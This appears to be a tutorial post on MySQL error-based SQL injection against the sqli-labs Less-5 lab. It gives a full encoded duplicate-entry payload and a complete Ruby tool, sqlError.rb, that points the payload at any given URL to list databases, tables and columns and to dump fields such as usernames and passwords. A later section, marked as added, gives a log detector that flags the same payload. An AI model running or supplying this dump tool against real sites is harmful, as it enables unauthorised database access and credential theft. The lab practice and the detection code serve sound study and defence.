Ruby Beginner Practice -> PHP+MySQL Error-Based Injection

測(cè)試目標(biāo)位 sqli-labs 第五節(jié)

http://ip/Less-5/?id=1

e.g.:
http://ip/Less-5/?id=1%27%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x656d61696c73%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20--+

[image: Paste_Image.png]

Let's write a program to run it:

#sqlError.rb --dbs url
#sqlError.rb --tables -D databasename url
#sqlError.rb --columns -T tablename -D databasename url
#sqlError.rb --dump -C 'id,username,password' -T tablename -D databasename url
require 'net/http'
require 'uri'

# $sql is replaced by the inner query. The floor(rand(0)*2) group-by key makes MySQL
# fail with "Duplicate entry '~...~1' for key 'group_key'", and the text between the
# two '~' markers is the query result.
$base_payload = "'+and(select 1 from(select count(*),concat((select (select ($sql)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+"

class String
    # "emails" -> "0x656d61696c73": a hex literal needs no quotes inside the query
    def to_hex; '0x' + self.unpack("H*")[0]; end
end

#Send Request Get Response (returns the body, or nil when the request failed)
def send_sqli(url,payload)
    uri = URI.parse(url)
    query = uri.query || ''
    # URI#query= percent-encodes the space, quote and '#' characters of the payload
    uri.query = query + payload
    http = Net::HTTP.new(uri.host,uri.port)
    http.use_ssl = true if uri.scheme == 'https'
    request = Net::HTTP::Get.new(uri.request_uri)
    request['User-Agent'] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:39.0) Gecko/20100101 Firefox/39.0"
    request['Connection'] = "keep-alive"
    request['Accept-Language'] = "en-US,en;q=0.5"
    # No hand-set Accept-Encoding: Net::HTTP only inflates a gzip body when it added
    # that header itself, so setting it here would leave the body compressed.
    begin
        puts "Sending......"
        http.request(request).body
    rescue StandardError => e
        puts "[!] Failed!"
        puts e
        nil
    end
end

def printDataNum(title,num)
    puts "[!] Received #{title} Number From Remote Server : #{num}"
end

def printData(number,dataAry)
    puts "Received Number #{number}"
    dataAry.each { |name| puts '|' + name.to_s + "|\n" }
end

def printOne(data)
    puts "[!] Received Data From Remote Server : #{data}"
end

# Block form so that '\1' or '\\' inside the query is not treated as a back-reference
def replace(content)
    $base_payload.sub(/\$sql/) { content }
end

# Pull the text between the '~' markers out of the error page; nil if absent
def getResult(content)
    return nil if content.nil?
    m = content.match(/~(.*?)~/)
    m && m[1]
end

def getDatabaseNum(url)
    sql = "SELECT concat(0x7e,count(distinct+table_schema),0x7e) FROM information_schema.tables"
    payload = replace(sql)
    html = send_sqli url,payload
    database_number = getResult html
    printDataNum 'Databases',database_number
    return database_number
end

#Get all databases
def getAllDatabases(url)
    databases = []
    number = getDatabaseNum url
    number.to_i.times do |i|
        sql = "select distinct concat(0x7e, table_schema, 0x7e) from information_schema.tables limit #{i},1"
        payload = replace(sql)
        html = send_sqli url,payload
        database_name = getResult html
        databases << database_name
        printOne database_name
    end
    printData number,databases
end

def getTablesNum(url,database)
    sql = "select concat(0x7e, count(table_name), 0x7e) from information_schema.tables where table_schema=#{database}"
    payload = replace(sql)
    html = send_sqli url,payload
    tables_number = getResult html
    printDataNum 'Tables',tables_number
    return tables_number
end

def getAlltables(url,database)
    tables = []
    number = getTablesNum url,database
    number.to_i.times do |i|
        sql = "select concat(0x7e, table_name, 0x7e) from information_schema.tables where table_schema=#{database} limit #{i},1"
        payload = replace(sql)
        html = send_sqli url,payload
        table_name = getResult html
        tables << table_name
        printOne table_name
    end
    printData number,tables
end

def getColumnsNum(url,table,database)
    sql = "select concat(0x7e, count(column_name), 0x7e) from information_schema.columns where table_name=#{table} and table_schema=#{database}"
    payload = replace(sql)
    html = send_sqli url,payload
    columns_number = getResult html
    printDataNum 'Columns',columns_number
    return columns_number
end

def getAllcolumns(url,table,database)
    columns = []
    number = getColumnsNum url,table,database
    number.to_i.times do |i|
        sql = "SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=#{table} and table_schema=#{database} LIMIT #{i},1"
        payload = replace(sql)
        html = send_sqli url,payload
        column_name = getResult html
        columns << column_name
        printOne column_name
    end
    printData number,columns
end

def getDataNum(url,table,database)
    sql = "select concat(0x7e, count(*), 0x7e) from #{database}.#{table}"
    payload = replace(sql)
    puts payload
    html = send_sqli url,payload
    data_number = getResult html
    printDataNum 'Data',data_number
    return data_number
end

def getAlldata(url,columns,table,database)
    alldata = []
    number = getDataNum(url,table,database)
    number.to_i.times do |i|
        sql = "select concat(0x7e,id, 0x20,#{columns},0x7e) from #{database}.#{table} limit #{i},1"
        payload = replace(sql)
        html = send_sqli url,payload
        data = getResult html
        alldata << data
        printOne data
    end
    printData number,alldata
end

if __FILE__ == $0
    case ARGV[0]
    when '--dbs'
        url = ARGV[1]
        getAllDatabases url
    when '--tables'
        url = ARGV[3]
        database = ARGV[2]
        database = database.to_hex
        getAlltables url,database
    when '--columns'
        url = ARGV[5]
        table = ARGV[2]
        database = ARGV[4]
        table = table.to_hex
        database = database.to_hex
        getAllcolumns url,table,database
    when '--dump'
        url = ARGV[7]
        columns = ARGV[2]
        table = ARGV[4]
        database = ARGV[6]
        getAlldata url,columns,table,database
    else
        puts "usage: sqlError.rb --dbs|--tables|--columns|--dump ... url (see the comments at the top of the file)"
    end
end

Tested on Windows:
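The payload above works because MySQL computes the floor(rand(0)*2) group-by key more than once while filling the temporary table, so the concat() value carrying the query result collides as a duplicate key and is echoed back in the error text. From the defender's side that construction is a distinctive signature in web-server logs. The following Ruby detector is an added example, not code from the original post: it URL-decodes the query string of each request in a few constructed combined-format access-log lines (one carries the payload from this post) and flags a request only when all three parts of the duplicate-entry trick appear together. The sample log lines, the function names and the signature set are my own assumptions.

```ruby
require 'cgi'

# Constructed sample lines in combined log format (not real traffic). The first
# request carries the error-based payload from this post; the others are benign.
SAMPLE_LOG = <<~'LOG'
  10.0.0.5 - - [01/Jan/2020:12:00:00 +0000] "GET /Less-5/?id=1%27%20+and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,column_name,0x7e)%20FROM%20information_schema.columns%20where%20table_name=0x656d61696c73%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20--+ HTTP/1.1" 500 1180
  10.0.0.6 - - [01/Jan/2020:12:00:01 +0000] "GET /Less-5/?id=1 HTTP/1.1" 200 512
  10.0.0.7 - - [01/Jan/2020:12:00:02 +0000] "GET /search?q=group+by+floor+count HTTP/1.1" 200 300
LOG

# Each signature is matched against the URL-decoded query string.
SIGNATURES = {
  rand_floor:   /floor\s*\(\s*rand\s*\(\s*\d*\s*\)\s*\*\s*2\s*\)/i, # floor(rand(0)*2) key
  group_by:     /\bgroup\s+by\b/i,
  count_star:   /\bcount\s*\(\s*\*\s*\)/i,                           # forces the temp table
  info_schema:  /\binformation_schema\./i,
  tilde_marker: /\bconcat\s*\(\s*0x7e\b/i                            # 0x7e = '~' delimiters
}.freeze

# The duplicate-entry trick needs all three of these at once; the other two
# signatures are reported as supporting evidence only.
CORE = %i[rand_floor group_by count_star].freeze

# Split a request target into path and decoded query string ("+" and %XX are
# both decoded, which is what the PHP side sees in $_GET).
def decode_query(request_target)
  path, query = request_target.split('?', 2)
  [path, query ? CGI.unescape(query) : '']
end

def sqli_indicators(decoded_query)
  SIGNATURES.select { |_, re| decoded_query.match?(re) }.keys
end

def error_based_sqli?(decoded_query)
  (CORE - sqli_indicators(decoded_query)).empty?
end

LOG_LINE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/

# Returns one hash per flagged request; lines that do not parse are skipped.
def scan_log(text)
  text.each_line.each_with_object([]) do |line, hits|
    m = LOG_LINE.match(line) or next
    path, query = decode_query(m[4])
    next unless error_based_sqli?(query)
    hits << { ip: m[1], time: m[2], method: m[3], path: path,
              status: m[5].to_i, indicators: sqli_indicators(query) }
  end
end

if __FILE__ == $0
  scan_log(SAMPLE_LOG).each do |hit|
    puts "[ALERT] #{hit[:ip]} #{hit[:method]} #{hit[:path]} -> #{hit[:indicators].join(', ')}"
  end
end
```

Requiring all three core parts keeps a benign search for "group by" from raising an alert, while the information_schema and 0x7e signatures tell the analyst how far the enumeration got. Decoding before matching matters: the payload arrives as %27, %20 and "+", and a rule written against the raw request line would miss it.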


[image: Paste_Image.png]